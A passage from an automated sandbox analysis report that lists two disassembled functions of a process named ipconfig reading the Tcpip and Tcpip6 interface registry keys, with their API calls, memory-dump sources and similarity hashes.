                                                                                                                              • memset.MSVCRT ref: 00F6228A
                                                                                                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00F62207,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\,00000200), ref: 00F622DF
                                                                                                                              Strings
                                                                                                                              • SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\, xrefs: 00F62291
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Openmemset
                                                                                                                              • String ID: SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
                                                                                                                              • API String ID: 180050240-3129059797
                                                                                                                              • Opcode ID: 3321ce8d42e0820fecd26db15109db42042c85364e0fd6e46309ea83e1c612ab
                                                                                                                              • Instruction ID: 9203bbd3f6fb156ad6831796ef772f166b99f29fbbe0c1f78760718ff837fbe8
                                                                                                                              • Opcode Fuzzy Hash: 3321ce8d42e0820fecd26db15109db42042c85364e0fd6e46309ea83e1c612ab
                                                                                                                              • Instruction Fuzzy Hash: 1F01F5B2600218ABE750EB14DC07FAA73ACEB10714F104069F915EA1C2DA74EA04A664
                                                                                                                              Function 00F62C01 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • memset.MSVCRT ref: 00F62C2B
                                                                                                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00F62BA8,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\,00000200), ref: 00F62C80
                                                                                                                              Strings
                                                                                                                              • SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\, xrefs: 00F62C32
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Openmemset
                                                                                                                              • String ID: SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\
                                                                                                                              • API String ID: 180050240-944716191
                                                                                                                              • Opcode ID: da33aab5629986eb0101710a5be37da4a3ba488323279124161dc4f0c9e05f05
                                                                                                                              • Instruction ID: 91cfb15269ac5d138cfc2cdfac23a77c53286e9c56b80d3845f692eeb05655f6
                                                                                                                              • Opcode Fuzzy Hash: da33aab5629986eb0101710a5be37da4a3ba488323279124161dc4f0c9e05f05
                                                                                                                              • Instruction Fuzzy Hash: 4F0124B220031DBBE750EB24DD07FAE77ACEB11714F108065FA15EA1C2DA78EE049A60